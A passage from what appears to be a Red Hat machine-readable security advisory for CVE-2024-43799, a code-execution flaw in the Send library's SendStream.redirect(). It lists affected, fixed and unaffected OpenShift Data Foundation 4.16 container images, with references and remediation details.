"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311153", }, ], notes: [ { category: "description", text: "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.", title: "Vulnerability description", }, { category: "summary", text: "send: Code Execution Vulnerability in Send Library", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", ], known_not_affected: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43799", }, { category: "external", summary: "RHBZ#2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43799", url: "https://www.cve.org/CVERecord?id=CVE-2024-43799", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", }, { category: "external", summary: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", url: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", }, { category: "external", summary: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", url: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", }, ], release_date: "2024-09-10T15:15:17.727000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-15T08:52:38+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8113", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", 